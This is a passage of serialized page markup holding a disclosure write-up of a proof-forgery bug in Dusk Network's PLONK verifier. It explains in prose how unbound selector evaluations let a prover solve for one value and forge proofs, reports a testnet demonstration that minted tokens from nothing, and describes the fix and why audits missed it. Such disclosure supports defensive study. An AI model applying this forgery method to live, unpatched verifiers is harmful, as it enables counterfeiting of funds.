59},[3680],[145261],{"type":33,"value":2794},{"type":28,"tag":116,"props":145263,"children":145265},{"className":145264},[3695],[145266],{"type":28,"tag":116,"props":145267,"children":145269},{"className":145268},[3700],[145270],{"type":28,"tag":116,"props":145271,"children":145273},{"className":145272},[3705],[145274],{"type":28,"tag":116,"props":145275,"children":145277},{"className":145276,"style":3675},[3710],[145278],{"type":28,"tag":116,"props":145279,"children":145280},{"style":3714},[145281,145285],{"type":28,"tag":116,"props":145282,"children":145284},{"className":145283,"style":3720},[3719],[],{"type":28,"tag":116,"props":145286,"children":145288},{"className":145287},[3725,3726,3727,3728],[145289],{"type":28,"tag":116,"props":145290,"children":145292},{"className":145291},[3680,3728],[145293],{"type":28,"tag":116,"props":145294,"children":145296},{"className":145295},[3680,3728],[145297],{"type":33,"value":29078},{"type":28,"tag":116,"props":145299,"children":145301},{"className":145300,"style":3760},[3759],[],{"type":28,"tag":116,"props":145303,"children":145305},{"className":145304},[3765],[145306],{"type":33,"value":3739},{"type":28,"tag":116,"props":145308,"children":145310},{"className":145309,"style":3760},[3759],[],{"type":28,"tag":116,"props":145312,"children":145314},{"className":145313},[3669],[145315,145319,145324],{"type":28,"tag":116,"props":145316,"children":145318},{"className":145317,"style":3780},[3674],[],{"type":28,"tag":116,"props":145320,"children":145322},{"className":145321},[3680],[145323],{"type":33,"value":1824},{"type":28,"tag":116,"props":145325,"children":145327},{"className":145326},[21401],[145328],{"type":33,"value":15074},{"type":28,"tag":122615,"props":145330,"children":145331},{},[145332,145342],{"type":28,"tag":122646,"props":145333,"children":145334},{},[145335],{"type":28,"tag":87,"props":145336,"children":145339},{"href":145337,"rel":145338},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L28-L51",[91],[145340],{"type":33,"value":145341},"Sender-authorship signatures",{"type":28,"tag":122646,"props":145343,"children":145344},{},[145345],{"type":33,"value":145346},"The transaction payload is signed by the sender's two signing key components",{"type":28,"tag":122615,"props":145348,"children":145349},{},[145350,145360],{"type":28,"tag":122646,"props":145351,"children":145352},{},[145353],{"type":28,"tag":87,"props":145354,"children":145357},{"href":145355,"rel":145356},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L63-L121",[91],[145358],{"type":33,"value":145359},"Sender encryption correctness",{"type":28,"tag":122646,"props":145361,"children":145362},{},[145363],{"type":33,"value":145364},"The sender data attached to each output note is a correct ElGamal encryption under the recipient note key",{"type":28,"tag":29,"props":145366,"children":145367},{},[145368,145370,145376,145378,145387],{"type":33,"value":145369},"Rusk does not consume these claims one by one. It consumes a single valid/invalid proof verdict over ",{"type":28,"tag":98,"props":145371,"children":145373},{"className":145372},[],[145374],{"type":33,"value":145375},"tx.public_inputs()",{"type":33,"value":145377}," via ",{"type":28,"tag":87,"props":145379,"children":145381},{"href":144817,"rel":145380},[91],[145382],{"type":28,"tag":98,"props":145383,"children":145385},{"className":145384},[],[145386],{"type":33,"value":144825},{"type":33,"value":141},{"type":28,"tag":29,"props":145389,"children":145390},{},[145391],{"type":33,"value":145392},"A soundness break in PLONK voids all of these constraints simultaneously, because forged selector evaluations make the entire circuit unconstrained rather than targeting any single check.",{"type":28,"tag":18457,"props":145394,"children":145395},{},[],{"type":28,"tag":63,"props":145397,"children":145398},{"id":89919},[145399],{"type":33,"value":145400},"The bug",{"type":28,"tag":29,"props":145402,"children":145403},{},[145404,145406,145413,145415,145426],{"type":33,"value":145405},"In the ",{"type":28,"tag":87,"props":145407,"children":145410},{"href":145408,"rel":145409},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L400",[91],[145411],{"type":33,"value":145412},"PLONK verification",{"type":33,"value":145414},", the verifier batches polynomial evaluations into a single KZG opening proof check. The evaluations included in this batch (committed via ",{"type":28,"tag":87,"props":145416,"children":145419},{"href":145417,"rel":145418},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L373",[91],[145420],{"type":28,"tag":98,"props":145421,"children":145423},{"className":145422},[],[145424],{"type":33,"value":145425},"E_evals",{"type":33,"value":145427},") are:",{"type":28,"tag":2108,"props":145429,"children":145430},{},[145431,145463,145488,145513],{"type":28,"tag":459,"props":145432,"children":145433},{},[145434,145440,145441,145447,145448,145454,145455,145461],{"type":28,"tag":98,"props":145435,"children":145437},{"className":145436},[],[145438],{"type":33,"value":145439},"a_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145442,"children":145444},{"className":145443},[],[145445],{"type":33,"value":145446},"b_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145449,"children":145451},{"className":145450},[],[145452],{"type":33,"value":145453},"c_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145456,"children":145458},{"className":145457},[],[145459],{"type":33,"value":145460},"d_eval",{"type":33,"value":145462}," (witness)",{"type":28,"tag":459,"props":145464,"children":145465},{},[145466,145472,145473,145479,145480,145486],{"type":28,"tag":98,"props":145467,"children":145469},{"className":145468},[],[145470],{"type":33,"value":145471},"s_sigma_1_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145474,"children":145476},{"className":145475},[],[145477],{"type":33,"value":145478},"s_sigma_2_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145481,"children":145483},{"className":145482},[],[145484],{"type":33,"value":145485},"s_sigma_3_eval",{"type":33,"value":145487}," (permutation)",{"type":28,"tag":459,"props":145489,"children":145490},{},[145491,145497,145498,145504,145505,145511],{"type":28,"tag":98,"props":145492,"children":145494},{"className":145493},[],[145495],{"type":33,"value":145496},"a_w_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145499,"children":145501},{"className":145500},[],[145502],{"type":33,"value":145503},"b_w_eval",{"type":33,"value":825},{"type":28,"tag":98,"props":145506,"children":145508},{"className":145507},[],[145509],{"type":33,"value":145510},"d_w_eval",{"type":33,"value":145512}," (shifted witness)",{"type":28,"tag":459,"props":145514,"children":145515},{},[145516,145522],{"type":28,"tag":98,"props":145517,"children":145519},{"className":145518},[],[145520],{"type":33,"value":145521},"z_eval",{"type":33,"value":145523}," (permutation accumulator)",{"type":28,"tag":29,"props":145525,"children":145526},{},[145527,145529,145533],{"type":33,"value":145528},"But the following selector evaluations were ",{"type":28,"tag":2583,"props":145530,"children":145531},{},[145532],{"type":33,"value":18152},{"type":33,"value":145534}," included:",{"type":28,"tag":2108,"props":145536,"children":145537},{},[145538,145549,145560,145571],{"type":28,"tag":459,"props":145539,"children":145540},{},[145541,145547],{"type":28,"tag":98,"props":145542,"children":145544},{"className":145543},[],[145545],{"type":33,"value":145546},"q_arith_eval",{"type":33,"value":145548}," (arithmetic selector)",{"type":28,"tag":459,"props":145550,"children":145551},{},[145552,145558],{"type":28,"tag":98,"props":145553,"children":145555},{"className":145554},[],[145556],{"type":33,"value":145557},"q_c_eval",{"type":33,"value":145559}," (constant selector)",{"type":28,"tag":459,"props":145561,"children":145562},{},[145563,145569],{"type":28,"tag":98,"props":145564,"children":145566},{"className":145565},[],[145567],{"type":33,"value":145568},"q_l_eval",{"type":33,"value":145570}," (left selector)",{"type":28,"tag":459,"props":145572,"children":145573},{},[145574,145580],{"type":28,"tag":98,"props":145575,"children":145577},{"className":145576},[],[145578],{"type":33,"value":145579},"q_r_eval",{"type":33,"value":145581}," (right selector)",{"type":28,"tag":29,"props":145583,"children":145584},{},[145585,145587,145594,145595,145602,145603,145610,145611,145618],{"type":33,"value":145586},"The prover places four selector evaluations in the proof struct. The verifier absorbs them into the transcript, and the widget verifier code uses them directly in the linearization check (",{"type":28,"tag":87,"props":145588,"children":145591},{"href":145589,"rel":145590},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/linearization_poly.rs#L33-L83",[91],[145592],{"type":33,"value":145593},"proof struct",{"type":33,"value":825},{"type":28,"tag":87,"props":145596,"children":145599},{"href":145597,"rel":145598},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L255-L286",[91],[145600],{"type":33,"value":145601},"transcript absorption",{"type":33,"value":825},{"type":28,"tag":87,"props":145604,"children":145607},{"href":145605,"rel":145606},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/arithmetic/verifierkey.rs#L92-L118",[91],[145608],{"type":33,"value":145609},"arithmetic widget",{"type":33,"value":825},{"type":28,"tag":87,"props":145612,"children":145615},{"href":145613,"rel":145614},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/ecc/scalar_mul/fixed_base/verifierkey.rs#L46-L102",[91],[145616],{"type":33,"value":145617},"fixed-base ECC widget",{"type":33,"value":145619},"). But they are never checked against the corresponding selector commitments in the verifier key, even though those commitments already exist. The prover sends whatever values it wants and the verifier trusts them.",{"type":28,"tag":29,"props":145621,"children":145622},{},[145623,145625,145629],{"type":33,"value":145624},"The easiest way to see why these four omissions are special is to contrast them with two nearby cases that are ",{"type":28,"tag":2583,"props":145626,"children":145627},{},[145628],{"type":33,"value":18152},{"type":33,"value":145630}," bugs:",{"type":28,"tag":2108,"props":145632,"children":145633},{},[145634,145774],{"type":28,"tag":459,"props":145635,"children":145636},{},[145637,145639,145684,145686,145692,145694,145699,145700,145705,145706,145711,145713,145719,145721,145766,145768,145773],{"type":33,"value":145638},"There is no prover-supplied ",{"type":28,"tag":98,"props":145640,"children":145642},{"className":145641},[3652,3653],[145643],{"type":28,"tag":116,"props":145644,"children":145646},{"className":145645},[3658],[145647],{"type":28,"tag":116,"props":145648,"children":145650},{"className":145649,"ariaHidden":3664},[3663],[145651],{"type":28,"tag":116,"props":145652,"children":145654},{"className":145653},[3669],[145655,145659,145664,145669,145674,145679],{"type":28,"tag":116,"props":145656,"children":145658},{"className":145657,"style":3780},[3674],[],{"type":28,"tag":116,"props":145660,"children":145662},{"className":145661},[3680,21251],[145663],{"type":33,"value":1797},{"type":28,"tag":116,"props":145665,"children":145667},{"className":145666},[21380],[145668],{"type":33,"value":313},{"type":28,"tag":116,"props":145670,"children":145672},{"className":145671,"style":113217},[3680,21251],[145673],{"type":33,"value":113220},{"type":28,"tag":116,"props":145675,"children":145677},{"className":145676,"style":93149},[3680,21251],[145678],{"type":33,"value":144348},{"type":28,"tag":116,"props":145680,"children":145682},{"className":145681},[21401],[145683],{"type":33,"value":1829},{"type":33,"value":145685}," field at all. ",{"type":28,"tag":98,"props":145687,"children":145689},{"className":145688},[],[145690],{"type":33,"value":145691},"ProofEvaluations",{"type":33,"value":145693}," contains ",{"type":28,"tag":98,"props":145695,"children":145697},{"className":145696},[],[145698],{"type":33,"value":145496},{"type":33,"value":825},{"type":28,"tag":98,"props":145701,"children":145703},{"className":145702},[],[145704],{"type":33,"value":145503},{"type":33,"value":6159},{"type":28,"tag":98,"props":145707,"children":145709},{"className":145708},[],[145710],{"type":33,"value":145510},{"type":33,"value":145712},", but no ",{"type":28,"tag":98,"props":145714,"children":145716},{"className":145715},[],[145717],{"type":33,"value":145718},"c_w_eval",{"type":33,"value":145720},", so the verifier never consumes an unbound ",{"type":28,"tag":98,"props":145722,"children":145724},{"className":145723},[3652,3653],[145725],{"type":28,"tag":116,"props":145726,"children":145728},{"className":145727},[3658],[145729],{"type":28,"tag":116,"props":145730,"children":145732},{"className":145731,"ariaHidden":3664},[3663],[145733],{"type":28,"tag":116,"props":145734,"children":145736},{"className":145735},[3669],[145737,145741,145746,145751,145756,145761],{"type":28,"tag":116,"props":145738,"children":145740},{"className":145739,"style":3780},[3674],[],{"type":28,"tag":116,"props":145742,"children":145744},{"className":145743},[3680,21251],[145745],{"type":33,"value":1797},{"type":28,"tag":116,"props":145747,"children":145749},{"className":145748},[21380],[145750],{"type":33,"value":313},{"type":28,"tag":116,"props":145752,"children":145754},{"className":145753,"style":113217},[3680,21251],[145755],{"type":33,"value":113220},{"type":28,"tag":116,"props":145757,"children":145759},{"className":145758,"style":93149},[3680,21251],[145760],{"type":33,"value":144348},{"type":28,"tag":116,"props":145762,"children":145764},{"className":145763},[21401],[145765],{"type":33,"value":1829},{"type":33,"value":145767}," claim (",{"type":28,"tag":87,"props":145769,"children":145771},{"href":145589,"rel":145770},[91],[145772],{"type":33,"value":145593},{"type":33,"value":1484},{"type":28,"tag":459,"props":145775,"children":145776},{},[145777,145779,145866,145868,145960,145961,145968],{"type":33,"value":145778},"There is a fourth permutation commitment ",{"type":28,"tag":98,"props":145780,"children":145782},{"className":145781},[3652,3653],[145783],{"type":28,"tag":116,"props":145784,"children":145786},{"className":145785},[3658],[145787],{"type":28,"tag":116,"props":145788,"children":145790},{"className":145789,"ariaHidden":3664},[3663],[145791],{"type":28,"tag":116,"props":145792,"children":145794},{"className":145793},[3669],[145795,145799,145804,145861],{"type":28,"tag":116,"props":145796,"children":145798},{"className":145797,"style":3780},[3674],[],{"type":28,"tag":116,"props":145800,"children":145802},{"className":145801},[21380],[145803],{"type":33,"value":347},{"type":28,"tag":116,"props":145805,"children":145807},{"className":145806},[3680],[145808,145813],{"type":28,"tag":116,"props":145809,"children":145811},{"className":145810,"style":93149},[3680,21251],[145812],{"type":33,"value":144243},{"type":28,"tag":116,"props":145814,"children":145816},{"className":145815},[3695],[145817],{"type":28,"tag":116,"props":145818,"children":145820},{"className":145819},[3700,21305],[145821,145850],{"type":28,"tag":116,"props":145822,"children":145824},{"className":145823},[3705],[145825,145845],{"type":28,"tag":116,"props":145826,"children":145828},{"className":145827,"style":92715},[3710],[145829],{"type":28,"tag":116,"props":145830,"children":145831},{"style":93196},[145832,145836],{"type":28,"tag":116,"props":145833,"children":145835},{"className":145834,"style":3720},[3719],[],{"type":28,"tag":116,"props":145837,"children":145839},{"className":145838},[3725,3726,3727,3728],[145840],{"type":28,"tag":116,"props":145841,"children":145843},{"className":145842},[3680,3728],[145844],{"type":33,"value":17190},{"type":28,"tag":116,"props":145846,"children":145848},{"className":145847},[21407],[145849],{"type":33,"value":21410},{"type":28,"tag":116,"props":145851,"children":145853},{"className":145852},[3705],[145854],{"type":28,"tag":116,"props":145855,"children":145857},{"className":145856,"style":92746},[3710],[145858],{"type":28,"tag":116,"props":145859,"children":145860},{},[],{"type":28,"tag":116,"props":145862,"children":145864},{"className":145863},[21401],[145865],{"type":33,"value":15074},{"type":33,"value":145867}," in the verifier key, but the verifier uses the commitment itself inside the linearization MSM rather than trusting a prover-supplied scalar ",{"type":28,"tag":98,"props":145869,"children":145871},{"className":145870},[3652,3653],[145872],{"type":28,"tag":116,"props":145873,"children":145875},{"className":145874},[3658],[145876],{"type":28,"tag":116,"props":145877,"children":145879},{"className":145878,"ariaHidden":3664},[3663],[145880],{"type":28,"tag":116,"props":145881,"children":145883},{"className":145882},[3669],[145884,145888,145945,145950,145955],{"type":28,"tag":116,"props":145885,"children":145887},{"className":145886,"style":3780},[3674],[],{"type":28,"tag":116,"props":145889,"children":145891},{"className":145890},[3680],[145892,145897],{"type":28,"tag":116,"props":145893,"children":145895},{"className":145894,"style":93149},[3680,21251],[145896],{"type":33,"value":144243},{"type":28,"tag":116,"props":145898,"children":145900},{"className":145899},[3695],[145901],{"type":28,"tag":116,"props":145902,"children":145904},{"className":145903},[3700,21305],[145905,145934],{"type":28,"tag":116,"props":145906,"children":145908},{"className":145907},[3705],[145909,145929],{"type":28,"tag":116,"props":145910,"children":145912},{"className":145911,"style":92715},[3710],[145913],{"type":28,"tag":116,"props":145914,"children":145915},{"style":93196},[145916,145920],{"type":28,"tag":116,"props":145917,"children":145919},{"className":145918,"style":3720},[3719],[],{"type":28,"tag":116,"props":145921,"children":145923},{"className":145922},[3725,3726,3727,3728],[145924],{"type":28,"tag":116,"props":145925,"children":145927},{"className":145926},[3680,3728],[145928],{"type":33,"value":17190},{"type":28,"tag":116,"props":145930,"children":145932},{"className":145931},[21407],[145933],{"type":33,"value":21410},{"type":28,"tag":116,"props":145935,"children":145937},{"className":145936},[3705],[145938],{"type":28,"tag":116,"props":145939,"children":145941},{"className":145940,"style":92746},[3710],[145942],{"type":28,"tag":116,"props":145943,"children":145944},{},[],{"type":28,"tag":116,"props":145946,"children":145948},{"className":145947},[21380],[145949],{"type":33,"value":313},{"type":28,"tag":116,"props":145951,"children":145953},{"className":145952,"style":113217},[3680,21251],[145954],{"type":33,"value":113220},{"type":28,"tag":116,"props":145956,"children":145958},{"className":145957},[21401],[145959],{"type":33,"value":1829},{"type":33,"value":269},{"type":28,"tag":87,"props":145962,"children":145965},{"href":145963,"rel":145964},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/permutation/verifierkey.rs#L24-L104",[91],[145966],{"type":33,"value":145967},"permutation verifier key",{"type":33,"value":1484},{"type":28,"tag":29,"props":145970,"children":145971},{},[145972,145974,145984],{"type":33,"value":145973},"The four selector evaluations fit neither of these safe patterns: they are prover-supplied scalars, they are used directly by verifier code, and they never appear in ",{"type":28,"tag":87,"props":145975,"children":145978},{"href":145976,"rel":145977},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L361-L373",[91],[145979],{"type":28,"tag":98,"props":145980,"children":145982},{"className":145981},[],[145983],{"type":33,"value":145425},{"type":33,"value":145985},", which leaves the master equation underconstrained.",{"type":28,"tag":29,"props":145987,"children":145988},{},[145989],{"type":28,"tag":206,"props":145990,"children":145993},{"alt":145991,"src":145992},"structural_trust_boundary","/posts/dusk-commitment-issues/structural_trust_boundary.svg",[],{"type":28,"tag":18457,"props":145995,"children":145996},{},[],{"type":28,"tag":63,"props":145998,"children":146000},{"id":145999},"the-exploitation",[146001],{"type":33,"value":146002},"The exploitation",{"type":28,"tag":29,"props":146004,"children":146005},{},[146006],{"type":33,"value":146007},"Since the selector evaluations are free variables, the verification equation becomes a linear equation the prover can solve after the fact.",{"type":28,"tag":29,"props":146009,"children":146010},{},[146011,146013,146019,146021,146026,146028,146033,146035,146041],{"type":33,"value":146012},"The prover commits to arbitrary witness polynomials, without needing a valid witness, and arbitrary quotient polynomials, where small random linear polynomials suffice. It follows the honest protocol through all commitment rounds, deriving the same challenges the verifier will. After seeing ",{"type":28,"tag":98,"props":146014,"children":146016},{"className":146015},[],[146017],{"type":33,"value":146018},"z_challenge",{"type":33,"value":146020},", it computes what the linearization polynomial ",{"type":28,"tag":2583,"props":146022,"children":146023},{},[146024],{"type":33,"value":146025},"should",{"type":33,"value":146027}," evaluate to for the pairing check to pass, then solves for ",{"type":28,"tag":98,"props":146029,"children":146031},{"className":146030},[],[146032],{"type":33,"value":145546},{"type":33,"value":146034},", the single free variable that makes the verification equation balance (setting ",{"type":28,"tag":98,"props":146036,"children":146038},{"className":146037},[],[146039],{"type":33,"value":146040},"q_c_eval = q_l_eval = q_r_eval = 0",{"type":33,"value":1484},{"type":28,"tag":29,"props":146043,"children":146044},{},[146045],{"type":28,"tag":206,"props":146046,"children":146049},{"alt":146047,"src":146048},"exploit_algebra","/posts/dusk-commitment-issues/exploit_algebra.svg",[],{"type":28,"tag":29,"props":146051,"children":146052},{},[146053,146055,146095,146097,146122,146124,146129],{"type":33,"value":146054},"To achieve this one may compute the linearization polynomial ",{"type":28,"tag":98,"props":146056,"children":146058},{"className":146057},[3652,3653],[146059],{"type":28,"tag":116,"props":146060,"children":146062},{"className":146061},[3658],[146063],{"type":28,"tag":116,"props":146064,"children":146066},{"className":146065,"ariaHidden":3664},[3663],[146067],{"type":28,"tag":116,"props":146068,"children":146070},{"className":146069},[3669],[146071,146075,146080,146085,146090],{"type":28,"tag":116,"props":146072,"children":146074},{"className":146073,"style":3780},[3674],[],{"type":28,"tag":116,"props":146076,"children":146078},{"className":146077,"style":92663},[3680,21251],[146079],{"type":33,"value":93482},{"type":28,"tag":116,"props":146081,"children":146083},{"className":146082},[21380],[146084],{"type":33,"value":313},{"type":28,"tag":116,"props":146086,"children":146088},{"className":146087},[3680,21251],[146089],{"type":33,"value":18939},{"type":28,"tag":116,"props":146091,"children":146093},{"className":146092},[21401],[146094],{"type":33,"value":1829},{"type":33,"value":146096}," with all selectors set to zero, evaluating it at ",{"type":28,"tag":98,"props":146098,"children":146100},{"className":146099},[3652,3653],[146101],{"type":28,"tag":116,"props":146102,"children":146104},{"className":146103},[3658],[146105],{"type":28,"tag":116,"props":146106,"children":146108},{"className":146107,"ariaHidden":3664},[3663],[146109],{"type":28,"tag":116,"props":146110,"children":146112},{"className":146111},[3669],[146113,146117],{"type":28,"tag":116,"props":146114,"children":146116},{"className":146115,"style":110501},[3674],[],{"type":28,"tag":116,"props":146118,"children":146120},{"className":146119,"style":113217},[3680,21251],[146121],{"type":33,"value":113220},{"type":33,"value":146123},", and comparing to the target value; the difference divided by the coefficient of ",{"type":28,"tag":98,"props":146125,"children":146127},{"className":146126},[],[146128],{"type":33,"value":145546},{"type":33,"value":146130}," gives the required value in a single field division.",{"type":28,"tag":18457,"props":146132,"children":146133},{},[],{"type":28,"tag":63,"props":146135,"children":146137},{"id":146136},"impact-on-dusk-network",[146138],{"type":33,"value":146139},"Impact on Dusk Network",{"type":28,"tag":29,"props":146141,"children":146142},{},[146143,146145,146152],{"type":33,"value":146144},"PLONK is the sole gatekeeper for Phoenix-specific correctness claims: note membership, ownership, note commitments, sender-authorship, and balance integrity are encoded entirely in the circuit. Rusk does check other preconditions such as nullifier uniqueness before it verifies the proof (",{"type":28,"tag":87,"props":146146,"children":146149},{"href":146147,"rel":146148},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L153-L184",[91],[146150],{"type":33,"value":146151},"preverify path",{"type":33,"value":146153},"), but for the claims inside the proof there is no secondary validation path. With forged proofs, an attacker could:",{"type":28,"tag":455,"props":146155,"children":146156},{},[146157,146162,146167],{"type":28,"tag":459,"props":146158,"children":146159},{},[146160],{"type":33,"value":146161},"Inflate the token supply by fabricating input notes that do not exist in the note tree, with arbitrary values. The forged proof convinces the network these notes are real, and the attacker mints DUSK out of nothing, ready to transfer to honest users or exchanges.",{"type":28,"tag":459,"props":146163,"children":146164},{},[146165],{"type":33,"value":146166},"Forge spends that bypass the ownership, membership, and balance checks that normally make a Phoenix input note valid.",{"type":28,"tag":459,"props":146168,"children":146169},{},[146170],{"type":33,"value":146171},"Move forged shielded funds through honest wallets, because once a forged Phoenix transaction is accepted, the resulting shielded outputs are not distinguishable from legitimate Phoenix outputs at the protocol level.",{"type":28,"tag":29,"props":146173,"children":146174},{},[146175],{"type":33,"value":146176},"We demonstrated this with a full end-to-end proof-of-concept on a local Dusk testnet:",{"type":28,"tag":455,"props":146178,"children":146179},{},[146180,146185,146195,146207,146212],{"type":28,"tag":459,"props":146181,"children":146182},{},[146183],{"type":33,"value":146184},"Set up a single honest Rusk node and create two wallets (honest and malicious), both with balance 0",{"type":28,"tag":459,"props":146186,"children":146187},{},[146188,146190],{"type":33,"value":146189},"The malicious wallet forges a PLONK proof to create ",{"type":28,"tag":4995,"props":146191,"children":146192},{},[146193],{"type":33,"value":146194},"2000 DUSK from nothing",{"type":28,"tag":459,"props":146196,"children":146197},{},[146198,146200,146205],{"type":33,"value":146199},"The malicious wallet transfers ",{"type":28,"tag":4995,"props":146201,"children":146202},{},[146203],{"type":33,"value":146204},"1337 DUSK",{"type":33,"value":146206}," to the honest wallet using a normal (honestly-proved) transaction",{"type":28,"tag":459,"props":146208,"children":146209},{},[146210],{"type":33,"value":146211},"The honest node validates both transactions and mines them into blocks",{"type":28,"tag":459,"props":146213,"children":146214},{},[146215],{"type":33,"value":146216},"The honest wallet shows a confirmed balance of 1337 DUSK",{"type":28,"tag":29,"props":146218,"children":146219},{},[146220],{"type":28,"tag":206,"props":146221,"children":146224},{"alt":146222,"src":146223},"end_to_end","/posts/dusk-commitment-issues/end_to_end.svg",[],{"type":28,"tag":29,"props":146226,"children":146227},{},[146228,146230,146236,146238,146245],{"type":33,"value":146229},"At the time of discovery, DUSK's market cap was roughly ",{"type":28,"tag":87,"props":146231,"children":146233},{"href":141531,"rel":146232},[91],[146234],{"type":33,"value":146235},"~60M",{"type":33,"value":146237},". The entire shielded transaction layer was at risk. Because Phoenix is privacy-preserving, forged outputs accepted into the shielded pool would have been difficult to distinguish after the fact, similar to Neptune Cash with the ",{"type":28,"tag":87,"props":146239,"children":146242},{"href":146240,"rel":146241},"https://neptune.cash/articles/critical-vulnerability-disclosure",[91],[146243],{"type":33,"value":146244},"Triton VM vulnerability",{"type":33,"value":141},{"type":28,"tag":18457,"props":146247,"children":146248},{},[],{"type":28,"tag":63,"props":146250,"children":146252},{"id":146251},"the-fix",[146253],{"type":33,"value":146254},"The fix",{"type":28,"tag":29,"props":146256,"children":146257},{},[146258],{"type":33,"value":146259},"The fix adds the four selector evaluations to the KZG batch opening check, so they are verified against the selector commitments already present in the verifier key:",{"type":28,"tag":2108,"props":146261,"children":146262},{},[146263,146308],{"type":28,"tag":459,"props":146264,"children":146265},{},[146266,146268,146279,146281,146287,146288,146294,146295,146301,146302],{"type":33,"value":146267},"Extend ",{"type":28,"tag":87,"props":146269,"children":146272},{"href":146270,"rel":146271},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/compiler/prover.rs#L509",[91],[146273],{"type":28,"tag":98,"props":146274,"children":146276},{"className":146275},[],[146277],{"type":33,"value":146278},"compute_aggregate_witness",{"type":33,"value":146280}," on the prover side to also include ",{"type":28,"tag":98,"props":146282,"children":146284},{"className":146283},[],[146285],{"type":33,"value":146286},"q_arith",{"type":33,"value":825},{"type":28,"tag":98,"props":146289,"children":146291},{"className":146290},[],[146292],{"type":33,"value":146293},"q_c",{"type":33,"value":825},{"type":28,"tag":98,"props":146296,"children":146298},{"className":146297},[],[146299],{"type":33,"value":146300},"q_l",{"type":33,"value":6159},{"type":28,"tag":98,"props":146303,"children":146305},{"className":146304},[],[146306],{"type":33,"value":146307},"q_r",{"type":28,"tag":459,"props":146309,"children":146310},{},[146311,146313,146323],{"type":33,"value":146312},"Add their evaluations to ",{"type":28,"tag":87,"props":146314,"children":146317},{"href":146315,"rel":146316},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362",[91],[146318],{"type":28,"tag":98,"props":146319,"children":146321},{"className":146320},[],[146322],{"type":33,"value":145425},{"type":33,"value":146324}," on the verifier side, so they're checked against the commitments in the verifier key",{"type":28,"tag":29,"props":146326,"children":146327},{},[146328,146330,146337],{"type":33,"value":146329},"This was done in ",{"type":28,"tag":87,"props":146331,"children":146334},{"href":146332,"rel":146333},"https://github.com/dusk-network/plonk/commit/645265b748d2698bcb403b794fc2d58340b340f1",[91],[146335],{"type":33,"value":146336},"commit 645265b7",{"type":33,"value":146338},", which landed on February 14, 2026.",{"type":28,"tag":18457,"props":146340,"children":146341},{},[],{"type":28,"tag":63,"props":146343,"children":146345},{"id":146344},"why-was-this-missed",[146346],{"type":33,"value":146347},"Why was this missed?",{"type":28,"tag":29,"props":146349,"children":146350},{},[146351,146353,146360,146361,146368,146370,146377,146379,146386],{"type":33,"value":146352},"Dusk's stack had been heavily audited: a ",{"type":28,"tag":87,"props":146354,"children":146357},{"href":146355,"rel":146356},"https://github.com/dusk-network/audits/blob/main/core-audits/2023-12_plonk-audit-report_porter-adams.pdf",[91],[146358],{"type":33,"value":146359},"December 2023 audit of dusk-plonk",{"type":33,"value":124003},{"type":28,"tag":87,"props":146362,"children":146365},{"href":146363,"rel":146364},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_phoenix-audit-report_jules-de-smit.pdf",[91],[146366],{"type":33,"value":146367},"September 2024 audit of Phoenix",{"type":33,"value":146369},", and a ",{"type":28,"tag":87,"props":146371,"children":146374},{"href":146372,"rel":146373},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_rusk-node-library_oak-security.pdf",[91],[146375],{"type":33,"value":146376},"September 2024 Oak Security audit of the Rusk node library",{"type":33,"value":146378},". Dusk's public ",{"type":28,"tag":87,"props":146380,"children":146383},{"href":146381,"rel":146382},"https://dusk.network/news/audits-overview",[91],[146384],{"type":33,"value":146385},"audits overview",{"type":33,"value":146387}," summarizes the broader audit program. The bug still went unnoticed because it hides behind a very easy mental-model mistake.",{"type":28,"tag":29,"props":146389,"children":146390},{},[146391,146393,146398],{"type":33,"value":146392},"At the polynomial level, selectors are public circuit descriptions. A reviewer who keeps that standard PLONK model in mind will naturally think \"selectors are verifier-side\" and move on, overlooking the architectural deviation where Dusk's verifier started consuming prover-supplied selector ",{"type":28,"tag":2583,"props":146394,"children":146395},{},[146396],{"type":33,"value":146397},"evaluations",{"type":33,"value":141},{"type":28,"tag":29,"props":146400,"children":146401},{},[146402],{"type":33,"value":146403},"This was a pure proof-system bug, not a Phoenix-circuit bug; the circuit constraints themselves were correctly written. The failure occurred entirely because the verifier accepted proof fields that bypassed the fundamental invariant established earlier: they were neither locally computed nor cryptographically bound to an opening proof.",{"type":28,"tag":29,"props":146405,"children":146406},{},[146407],{"type":33,"value":146408},"The check for this class of bug is mechanical: enumerate every field in the proof's evaluation struct and verify that each one either appears in the opening proof batch or is computed locally by the verifier.",{"type":28,"tag":63,"props":146410,"children":146412},{"id":146411},"a-similar-bug-in-espresso-systems-jellyfish",[146413],{"type":33,"value":146414},"A similar bug in Espresso Systems' 